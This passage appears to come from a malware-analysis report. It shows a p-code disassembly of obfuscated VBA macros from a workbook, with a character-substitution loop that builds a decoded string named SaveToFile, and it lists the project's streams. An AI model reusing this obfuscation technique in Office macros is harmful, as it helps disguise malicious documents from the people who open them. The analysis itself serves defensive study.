' 	Ld KIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTY 
' 	FnLen 
' 	For 
' Line #141:
' 	Ld KIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTY 
' 	Ld Y78R 
' 	LitDI2 0x0001 
' 	ArgsLd Mid 0x0003 
' 	Ld USub 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo Sheet3 
' 	EndIf 
' Line #142:
' 	StartForVariable 
' 	Next 
' Line #143:
' 	Label Sheet3 
' Line #144:
' 	Ld SaveToFile 
' 	Ld IHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCH 
' 	Ld Y78R 
' 	LitDI2 0x0001 
' 	ArgsLd Mid 0x0003 
' 	Concat 
' 	St SaveToFile 
' Line #145:
' Line #146:
' 	CaseElse 
' Line #147:
' Line #148:
' 	Ld SaveToFile 
' 	Ld USub 
' 	Concat 
' 	St SaveToFile 
' Line #149:
' Line #150:
' 	EndSelect 
' Line #151:
' Line #152:
' 	StartForVariable 
' 	Next 
' Line #153:
' Line #154:
' 	StartForVariable 
' 	Ld LSub 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld Workbook 
' 	FnLen 
' 	For 
' Line #155:
' Line #156:
' 	StartForVariable 
' 	Next 
' Line #157:
' 	EndFunc 
' _VBA_PROJECT_CUR/VBA/Sheet1 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet2 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet3 - 985 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.